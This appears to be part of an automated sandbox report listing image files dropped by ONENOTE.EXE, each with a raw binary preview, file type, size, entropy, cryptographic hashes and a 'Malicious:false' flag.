                                                                                                        Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13241
                                                                                                        Entropy (8bit):7.931391290415517
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                        MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                        SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                        SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                        SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1657
                                                                                                        Entropy (8bit):7.80882577056055
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                        MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                        SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                        SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                        SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 780x107, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2898
                                                                                                        Entropy (8bit):7.551512280854713
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:N9YMTXc4gpw+EIWnqQ5G+NE9VTzRFvS4+Xh+AKrNx+JuCluc3Eeky8etajhDCFex:/hDc4rPIoNEzbS4+XhOrGJu1cUHeoVey
                                                                                                        MD5:7C7D9922101488124D2E4666709198AC
                                                                                                        SHA1:00CC44A1B84D4D94A0ACE8834491EB5F65D04619
                                                                                                        SHA-256:20016E5FA1A32DCE5AF4E92872597E36432185A7BB2E61C91F362BD68484529B
                                                                                                        SHA-512:882944B2CF040485899128E03B7499C540D481E45FE8017DBF4FE0330157B2D8ABB7334DDB31C112BA0EFE3722A554883917C54155A7F60044D2D7F3D848260F
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......k....".......................................2...........................c.....TUb...Sa...QRqr..............................!.....................Q...R..!..............?...$.)m.1...%%bV.J..H....-.%a[...I"WJ..:.X.:TT.$.......N.-NR.E..-NR.E...9..E....$.k.....B.I,I)..J...kr..+)..I,Yj..YbI..+,J..e..Z..V.e.$V..TV.X..V.YQZ.EQ..U%PY[.[.R.EP............................| F.. ...j*...!m.!j.I%.j.$...YeEYYEEUE..eY[.hEEUeEil.....%..el...V..TUYA.U.UTTUT.Z..UQQUQE...V.,...UlE.U[.lEP.P.@......................................R1...AR1m.....#..$:.T.p..IJ.t.....A..AH.,5..]F!a.XJFaa. ..a.!*.aa. X.e.......bB.b..,HX[,!..,,.c0.,..U..X..(,,...B(.,..4..B.`..".a..-......"...........................>D..IKEb...t.....)u.....)K.%+L\.J]i)*b.JR.IIL\i)u....T............T.....qs.it.iJ...])ZJb.....X....U.A...V1..B.R1....X...,.c...,%X...,%#0...,H
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4490
                                                                                                        Entropy (8bit):7.928016176674318
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                        MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                        SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                        SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                        SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):22634
                                                                                                        Entropy (8bit):7.974332204835705
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                        MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                        SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                        SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                        SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 50 x 556, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):977
                                                                                                        Entropy (8bit):7.231269197132181
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:6v/7QiFJaY/z+obuqFA4fypjQSbtBK+lcqNGSbb7XTJArRRzN5DjNRkPmu5cCbR2:x0QY7xbjy9pY0JPXLTWroeuCCbX0
                                                                                                        MD5:B7F74C18002A81A578A4EE60C407A8D3
                                                                                                        SHA1:70A7D4BB1B3ADF4397D168AD0D81B286F88EBDE0
                                                                                                        SHA-256:95F59A0433050180D4C0E8858B83363D51BEA6752A8B7CA516A8677854D8F5B6
                                                                                                        SHA-512:13186A7CDCE80BCA9D2238666D6D7A989FA1887EABFA5D8A9A63EEC304DFD4BE8EFF652205FA56E1D1CEE7D3680AF8C70A952AF73AB3C246400E8D4EBECBDBA9
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...2...,........A....PLTE...................................................................................................................................................................................$.y.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^...0.D_.......cck.....%a...X.a0Y...-..!.G...[....(.r.H.$...1 .zq.4V.e|a.6.X..4..kl.%....=w....6..TN.....{.4..T/.z...../.....3..!~..t.#b..^.....E!.SFb ...-.....^...,..C.!.b...i._c...s.X.w.. lsQH..H.gKc@@...i. ....m...;Ci....@G.; V{..lO..\.R9e$..{.....P...E.+.2.0D.B,..P...56.?......K.6..TN....^z.4..T/.z...../.....3..!~..t.]b........E!.SFb ...-.....^...,..C.!.b...i._c..Y.O...?.9k2.M.?5 .n.P...,...d._..%M?....6....,.1..R.4.a.R.+..U.Q..P...vd..T........j .]@....."..lJ../.90.4...Y. ...9.%...{......Hc%.....i..%M?aG..H....o.q.......4.......X.d9.r..CI.O.5.Ri0?.s\b....w...>/k..4V.)Y....P...vd..T........j .]@....."..lJ../.90..2..MP..l..?....K.X.....IEND.B`.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):41893
                                                                                                        Entropy (8bit):7.52654558351485
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:pZvVQkUbOHxx3pvVmO5rsP5gUdXwFMuv53knzyncaXgRDqPU:pZkijV5wScXwFMYknzucaXgRyU
                                                                                                        MD5:F25427EFECFEE786D5A9F630726DD140
                                                                                                        SHA1:BC612A86FF985AB569ED1A1EA5FFC4FDB18FC605
                                                                                                        SHA-256:5A36960DF32817E8426BD40A88F88B04FB55B84BAEF60F1E71E0872217FDB134
                                                                                                        SHA-512:B102F34385196D630F198667E874F25ADBC737426FDAE0747EC799B33632E5DC92999C7C715DC84D904342738930267AB1709870BDAA842243E4C283FE5E1554
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................!.1AQ....aq......"......2...Xx..9BRr#.b3$..&..g.8....%F'G.(H.Ss..D5E..v..W..Cc.deu..7w.h.).....................!.1....A..Qaq...Ttu.6..."R..5...2B..S....bcs.Dd%&r3C...#$...Ue.............?..R...%.R...t.MQ*.l...v...V]..n...Zw....M....4..F.&&bb0.:]l......ay.r<..3.l.Q^.........I54.N2.8..2s...w..r6.......[1Zh....O...9..>...B......x]...r.\.\..v..~....y.QT.3.......=....r..}.l.....o;....M..C1....w)...+o1f.]...MoA.E..s5..i.\....miGsy..m\.Zj....I'YU.\tU6La5v.>.K..m.]1.......k..0....</5v.V7lY.e.vV.+./[....f..u{....s.}.Rb.Z.....Y.6]..m....V.\...Mr.=r...K...l..%..m^.......X.(..fG..[F*ly.jL.a4..vs..o.e..q.9km..w1.yg.....r_.*h.n..5i.-.{Y.l...<...'Or.s..Z....../JP.....\FV.S..............m
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16003
                                                                                                        Entropy (8bit):7.959532793770661
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                        MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                        SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                        SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                        SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):7374
                                                                                                        Entropy (8bit):7.955141875077912
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                        MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                        SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                        SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                        SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13030
                                                                                                        Entropy (8bit):7.948664903731204
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                        MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                        SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                        SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                        SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):67991
                                                                                                        Entropy (8bit):7.870481231782746
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:3PC0XJjsmsKuZRG1pXuZ6z3wARnV9AEnieCc7cllJcHJ:qyMBzkUZ0gq25c7Z
                                                                                                        MD5:1271B1905D18A40D79A5B9DB27EE97EA
                                                                                                        SHA1:9618608FBD7342DE6C71220A36C3F4995BA9C13E
                                                                                                        SHA-256:5B321A4D81BD499B289B1755F6450A42047C494DFBC112DBD56DA4CED2C15C1A
                                                                                                        SHA-512:C32DD26047F6B8AA061085B38AC2B8335868E1BFD8731DB65544309223A955FA4BF45B06AC8D244408658F51A1775B6F19FF0FFC804989DE706DE8EB36F1436F
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1..AQa..q..".........2...BR#b.r.3...$.'...)..C%7gw..(.S.W89.......................!1.A.Qa.q".....2...#....B.t......rc.$%67Rb3s&'CUu.v....S.d5.V4T.e.............?...?..Wj.e.e.......w/..E..eOw_.....6......u..C6h.,..;.g.D8Z..-)O..jy..e;.u.g..w..[.L""k'w.......'1'.[......=..P...S.9a.V./O....q=8xk]...........9......F...e9'....9.O.... .&.....p......c.4...mr...?.......L..'.....0....+..|_...POM=7.?.2.a....};.Z..y./....>./.C.<...;.....|.1>...........S.8.o.O...+..n2...k../.X..9...Y...:.....\...Dk......q.K..\.Wuh.!Z?.mu...R.5.A.S.h.0..[..v..+M.....aUi*.k..?#..._...X..R.&]..[..;../]L..f..V......*.e...ut&.#.J.5....c%..o.$..v.<K.6..T.IP.....6X.*.uf..t0^..-.)m$.!.q(.j.f;..WB6.b.B..R.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2270
                                                                                                        Entropy (8bit):7.845368393313232
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                        MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                        SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                        SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                        SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                        Malicious:false
